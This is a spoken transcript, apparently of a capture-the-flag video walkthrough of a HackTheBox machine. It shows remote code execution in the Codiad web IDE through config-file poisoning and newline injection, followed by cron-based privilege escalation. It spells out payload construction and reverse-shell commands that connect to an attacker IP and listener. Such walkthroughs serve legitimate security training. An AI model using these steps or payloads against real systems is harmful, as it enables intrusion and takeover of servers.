google.com, put the website in, say it is Chinese, and click translate, it still doesn't work. So since I don't have the language pack, it's going to be even tougher to explain this. Because I don't speak Chinese, and I definitely don't speak ASCII. But this exploit is kind of half working, because what it's saying is if there's a blank Kodiad instance that is not configured, you can poison the config file with the install script to get code execution. So let's just go to GitHub Kodiad and step through it. So GitHub Kodiad, and I think it is, let's see, components, update, no, it's, let's see, project. Let's see, does he say, where's this PHP script that he's showing? Components install. I didn't see install. Maybe I'm just blind. So I'm in components. No, I'm not. Now I am. Yeah, install. And then process.php. So let's get this and open up in our text editor. So vim process.php, paste it, set paste, paste it, and go through this. So this is a part of the install script, and what it's doing is when you do time zone, this is writing the time zone variable and putting whatever you say into config.php. So what the exploit is since this is a post, we can just put like system run command and run a command. However, the issue right now is Kodiad is very much installed. So we can't just run this script. If we try doing the exploit, it's just not going to work because it's going to detect files exist and say we can't go. However, we have virtual host on this box, so we can just install it to like chat or something. So let's take a note at what we'll have to do. So the blog post just has poisoning the config file. It doesn't go into using Kodiad to install from scratch. And we don't really have the native install process because we're not running this from shell. We can only use this process.php or other files on the server. Thankfully, we only need things out of this process.php. The logic of this is essentially if users.php exists, exit. And this is the reason why we can't just install this over top of each other. Because when it checks for this users.php file, it sees it's going to exist and it doesn't proceed. So we can verify that by dev.player.htb / what is it? Data users.php. And we see that didn't return a 404 error, so this exists, and that check is here. So we have to make sure those files don't exist, and that's where the virtual host helps us. So vhost helps us. 2, the place where it writes config has to exist. So if we look at, is it right? Save file. So save file, capital F, where it writes this config, it has to exist, and config is going to be in, before then, it's going to try to write these files, active projects and whatnot. So place to write data and workspace. Has to exist. And there is a make dir functionality in the script. So if we go to mkdir, it will make these workspaces if we call the script in the correct way. So that's what we want to do, because we're going to abuse this to make dir data and make dir workspace. And we're going to do that in the chat directories. And then we will call save config to write a poisoned config into chat. So hopefully that kind of makes sense, at least the process. So let's go through this. The first thing we have to do is have a post request to components install process.php. So let's go to components install process.php. Let's intercept this request. And intercept's not on. So let's go to proxy, intercept on, send this into a repeater, and change this to a post. So the first thing we have to do is make sure these files don't exist. And remember, there is that file exist call on the users, projects, and active. And it's generating that by taking the post path and just appending these directories. So I'm just going to put path is equal to please support on Patreon. So that's not going to exist because it's going to put the path to please support on Patreon/workspace. And that definitely doesn't exist on the server. So we got all those settled. Now we just have to create the directories. So we passed this if statement and we're in here. It wants username and password. So, and username is equal to ipsec and password is equal to please subscribe. So now we're past these. Now it wants project name. And if project path is not set, it defaults to project name. So I'm going to ignore project path and only specify the name. And let's see exactly how project path is used. If we go, project path is where our make dir is going to be created. So let's just set project path, or project underscore name is equal to var www chat/data. And that may be enough to create the directories. So if I did this correctly, which I probably didn't, we'll get this working. So let's go to chat.player.htb data, not found. And you only have, once we get to the actual exploit, you only have one chance to make this work. So we get a cannot open file. But if we refresh, we get forbidden. So now that data directory exists, so that is good. The other one we need is a workspace directory. So let's do workspace and click send. So we created both directories, data and workspace. So now we can do a whole different post and keep going through this. And eventually set the poison config file. And I'm not going to step through this entire thing. The process should be relatively straightforward once you have all the variables. But the project path, we want to change this now to be var www chat. And the reason why we want to change this is because now we got that data directory and everything existing, but what doesn't exist is users.php. So that is in our favor. So let's just do URL encode all characters, %2f. I don't think it likes slashes, so I'm just going to encode them. Because this part, you only have one chance. Because once it writes that config and creates all this user stuff, then you're just going to be SOL, because you can't delete things. So, very critical we do this correctly. It wants a password confirm, I believe. So we'll do password confirm, please subscribe. And then let's see. Project name, that should be fine. Let's make sure project name is not used elsewhere. Project underscore name. Let's see, project data. I'm going to do project name is equal to something. So project name will be please subscribe. And project path. Project path. We probably want this to be the actual path. There we go. And then finally we want time zone. So, and time zone is equal to America %2f New York. It's a valid time zone. And what we have to do is close this out, I think. I think we do a double quote this to close out. So where is it writing time zone? So we're writing right here. So we're doing the double quote and parenthesis to close that out. And then putting this, and we can write our code. So we'll just do system and request IPsec, and then a comment to comment everything that is after that. URL encode. And we're really going to hope this works. Password confirm, project name. I'm just glancing over everything because, again, we screw this up. We may have to revert the box. Send. We got a success. So now if we go to chat.player.htb, config.php should exist. And if we say IPsec equals who am I? Yes, we got a shell. So let's go to a root shell to show exactly what happened. So var www chat. If we vim config.php and look at time zone, we can see this is where we wrote, and then here's us injecting the double quote parenthesis, and then our shell command, and then getting rid. And I think this could have been avoided is if they prevented something from calling config.php directly is one of the quickest ways to avoid this, maybe. I'm not sure. But a lot of times when you can write directly into PHP files, specifically like config, because that's so common, you have a lot of attack surface. So let's just get the shell on the box and we'll do the privesc the other way. Actually, yeah. We can get a shell on the box real quick. That won't take long. Intercept on. Okay. Change request method. bash-i, like this. Dev TCP 10.10.14.2, 9001, 0, and 1. That looks right. Let's just preface this with bash-c to ensure this is running in bash. Send it to repeater because I never typed things correctly the first time. And CLVNP 9001. Send. Like I said, never type things correctly the first time. Except that looks correct. Pentest monkey, reverse shell, cheat sheet. Turn off. Go here. -I. Yes. Did I do something silly? Just like forget to URL encode this. That's better. URL encoding helps. So now we're a shell as www-data. Let's go back up real bit and go to the other one. So if we go to the GitHub Codiad remote code execution exploit, this one, and then let's add something into the code to proxy it and see exactly what this does, to see if it's doing the same thing or something different. Chances are it's doing something different because it requires a username. So let's go into this directory, vim exploit.py, look at a print statement. This is Python 2 because there's a space. So let's see, session. Oh, they're using this. So we can just do s.proccesses update and HTTP 127.0.0.1.80.80. So Python exploit.py, does it give us... S is not defined. Oh. Session.proxies? Okay. Normally when I do a session, I just have the name as S, but they did session, that's fine. So Python exploit.py, HTTP, dev.player.htb, Peter, go here, grab his password. Oh, this is probably doing the same exact thing we did manually. I don't need to step through this. I just realized what was happening, I think. So 10.10.14.2, 9001, Linux. It's only one intended way, but I guess you're saying quick way to step through a Python script. So this is the command it's going to run. It's funny, they're doing the same thing I do. So let's see. Please execute nc lvnp 9001. Following command on your VPS. Oh, wow. That's weird. They want both of these ran, I think. I don't know if I like the script anymore. So, okay. We're logging in. So, authenticate password. So, we're getting the home page after we log in. Searching for hacker. And doing nc 10.10.14.2 on 9001 and calling bin bash. I don't know if I like this. Run this again. Yes. Doesn't seem to be working. Let's see. dev.player.htb. That was it, right? It wanted the trailing slash. Wow. So, okay. Let's add that session back in and look at it. Wish I didn't delete the line. Session, proxies, update HTTP 127.0.0.1.80.80. Okay. Intercept on. Run these commands that it wants. Yes, we ran that. Okay, so I guess this search file type has, %0a. This is new line. So that's probably the vulnerability. I don't know what 23 is. Okay, that's what that is. But I bet if we undo this, Control-Shift-U, yep, new line, %0a. So adds a new line there, and that's it. So it's just a straight up call to probably system or something. It's a weird vulnerability. I guess you can look at the script and analyze and see exactly what it's doing, but I'm getting tired of talking. So let's just hurry up and finish this video. So what was that script's name? Root shell, cron tab-l. It is this buff.php. If we head this, we want to edit this code. So if we vi or cat the file, we can see that. I'm just going to do echo-n. I'm going to get base64 and overwrite this whole file. So let's go here. I have pentest monkey up, so let's just grab the PHP reverse shell right here. V shell.php, paste, and we will do 10.10, 14.2, 9001. Base64 shell.php -w0 to put it on one line. And did not do that correctly because we need the silly PHP tags. Sock open. Sure. Okay. Copy. Close that. Here. Paste. Base64-D to this weird file. So if we cat the file, we now got a thing, nc lvnp 9001, and we just wait for the new minute to hit, which should happen in 30 seconds. Date 20 seconds. Okay, 15 seconds has happened. Any second we should get a callback if we did this correctly, and there we go. So now we have the shell. If we do pwd, we are root. So that is the other way to do the box if you didn't want to do PHP serialization. Hope you enjoyed the video. Take care, and I will see you all next week. Actually, I lied. Not knowing how that one code execution worked is bothering me. So let's just go look at this real quick. So I'm going to go back to Codiad's GitHub. So GitHub Codiad. Go here, and let's go to burp. Target. No, we want proxy, history, and we want to look at components, file manager, controller.php with the action search. So components, file manager, controller.php, and we want to look at search. So search is going to call file manager search. Okay. So let's see, what is this command? Search is that. What is file Man, I can't type manager. There we go. So it's getting files out of this class.filemanager.php. So let's see, is that here? Yes, it is. So let's see, search. Okay. So this search string is equal to post search string. So it's equal to this. And it is doing escape shell args. So it's preventing any like arguments from being called. We did search file type. So it's doing the same thing again, escaping any arguments. So let's see where search file type is used. Right here. And it's used in the output of shell exec. So what we're doing is taking this code, and what it's running is it's running this shell exec command. And we are injecting right here with this search file type, and we inserted a new line. So boom, new line. And then we put our nasty commands and then added a comment. So now shell exec runs this find command, doesn't work, a line break, then runs our nasty command. So that's exactly what is going on. And I guess the main flaw here, I'm not sure if it's, well, probably not patched, but when you have this, the developer was expecting the escape shell arg to be able to prevent all avenues of code injection. However, escape shell arg did not filter the new line, so that's where we got the code execution from. With that being said, hope you guys enjoy the box. Take care, and I'll see you next week.